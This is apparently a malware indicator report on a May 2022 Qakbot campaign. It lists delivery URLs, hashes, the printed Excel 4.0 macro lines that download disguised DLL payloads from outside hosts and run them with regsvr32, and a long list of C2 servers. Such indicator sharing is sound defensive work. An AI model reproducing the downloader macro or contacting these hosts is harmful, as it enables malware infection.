Qakbot_AA_11.05.2022.txt
11.05.2022 | Qakbot | AA | Version 403.683 | Campaign | 1649273252
******************************
.url https://contractorandconsulting.com/nroi/iieiasvtrtvtea
.url https://steptoe-and-son.com/man/omdlreoone
.xls 894dad8d458beefec849665e63f6747b7e8f9428636fbacb7e33e8bf23da28d6
.dll b27cdf8db38f91a7af314654023d412ac2044148ebdffcdaccd31cfbff9a4bd8
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Imchtria", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Imchtria\Nitubsrta", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://intconjsc.com/TBFQsJiVAv/Pmnhf.png", "C:\Imchtria\Nitubsrta\Mibyense.OOOOOCCCCCXXXXX")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://ktd-auto.com/vNQEgKwUwti8/Pmnhf.png", "C:\Imchtria\Nitubsrta\Mibyensea.OOOOOCCCCCXXXXX")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://enoktextile.com/hjeBrBwMdY/Pmnhf.png", "C:\Imchtria\Nitubsrta\Mibyenseb.OOOOOCCCCCXXXXX")
https://intconjsc.com/TBFQsJiVAv/Pmnhf.png
https://ktd-auto.com/vNQEgKwUwti8/Pmnhf.png
https://enoktextile.com/hjeBrBwMdY/Pmnhf.png
https://newthinkconectores.com.br/FZayiWyMa/Cbvnh.png
https://trucker.fit/fo8Lwyr0/Cbvnh.png
https://marcioidalino.com.br/czAzb2BcXg/Cbvnh.png
*************************************************
Execution chain (process command lines) >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\z397139224.xlsb
regsvr32 /s calc
regsvr32 C:\Imchtria\Nitubsrta\Mibyense.OOOOOCCCCCXXXXX
regsvr32 C:\Imchtria\Nitubsrta\Mibyensea.OOOOOCCCCCXXXXX
regsvr32 C:\Imchtria\Nitubsrta\Mibyenseb.OOOOOCCCCCXXXXX
*************************************************
https://tria.ge/220511-pqlqksgdg9
*************************************************
C2 servers (IP:port)
91.177.173.10:995
176.67.56.94:443
148.0.57.85:443
172.115.177.204:2222
70.46.220.114:443
37.186.54.254:995
24.178.196.158:2222
118.161.15.217:995
46.103.186.43:995
197.89.6.37:443
181.208.248.227:443
103.246.242.202:443
83.110.89.191:443
86.97.246.216:2222
108.60.213.141:443
188.50.241.63:995
47.23.89.60:993
92.132.172.197:2222
78.100.197.230:6883
120.150.218.241:995
86.98.78.177:993
101.51.76.46:443
39.44.86.21:995
74.14.7.71:2222
86.97.8.200:443
84.241.8.23:32103
86.97.246.216:1194
79.129.121.68:995
38.70.253.226:2222
182.191.92.203:995
175.145.235.37:443
185.249.85.200:443
196.203.37.215:80
32.221.224.140:995
197.162.117.38:995
140.82.49.12:443
41.228.22.180:443
75.99.168.194:443
93.48.80.198:995
148.64.96.100:443
86.132.13.91:2078
82.152.39.39:443
41.38.167.179:995
2.50.4.57:443
217.128.122.65:2222
172.114.160.81:995
186.90.153.162:2222
118.161.15.217:443
37.34.253.233:443
2.34.12.8:443
46.107.48.202:443
72.76.94.99:443
124.40.244.118:2222
201.42.3.27:32101
78.100.235.8:2222
76.70.9.169:2222
45.241.145.155:993
203.122.46.130:443
202.134.152.2:2222
75.99.168.194:61201
119.158.122.112:995
183.82.103.213:443
201.210.162.138:2222
173.174.216.62:443
80.11.74.81:2222
86.98.208.214:2222
140.82.63.183:995
149.28.238.199:443
144.202.2.175:995
45.76.167.26:995
144.202.3.39:443
45.63.1.12:995
149.28.238.199:995
140.82.63.183:443
144.202.2.175:443
45.76.167.26:443
144.202.3.39:995
45.63.1.12:443
89.101.97.139:443
103.107.113.84:443
39.44.23.250:995
208.107.221.224:443
76.25.142.196:443
45.46.53.140:2222
121.74.167.191:995
39.52.40.18:995
173.21.10.71:2222
174.69.215.101:443
5.32.41.45:443
73.151.236.31:443
190.252.242.69:443
85.246.82.244:443
82.41.63.217:443
187.208.0.99:443
47.156.191.217:443
70.51.137.64:2222
72.252.157.172:990
72.252.157.172:995
100.1.108.246:443
201.142.133.198:443
102.182.232.3:995
201.1.202.82:32101
40.134.246.185:995
24.139.72.117:443
24.55.67.176:443
179.158.105.44:443
201.172.23.68:2222
90.120.65.153:2078
187.102.135.141:2222
189.146.87.77:443
187.251.132.144:22
191.99.191.28:443
41.215.152.211:995
63.143.92.99:995
186.106.206.47:443
39.49.7.132:995
69.14.172.24:443
109.12.111.14:443
86.195.158.178:2222
189.26.55.114:443
121.7.223.59:2222
58.105.167.36:50000
67.165.206.193:993
187.207.47.198:61202
94.36.195.102:2222
128.106.123.187:443
86.190.159.132:443
103.157.122.130:21
67.209.195.198:443
101.50.67.212:995
106.51.48.170:50001
109.228.220.196:443
88.228.251.169:443
104.34.212.7:32103
181.222.130.143:993
24.152.219.253:995
111.125.245.118:995
39.53.156.127:995
191.251.134.129:443
197.205.106.232:443
103.139.243.207:993
116.30.161.215:995
103.139.243.207:990
39.52.54.195:993
81.215.196.174:443
217.118.46.41:2222
89.86.33.217:443
120.61.3.169:443
2.50.17.128:2222
180.129.20.164:995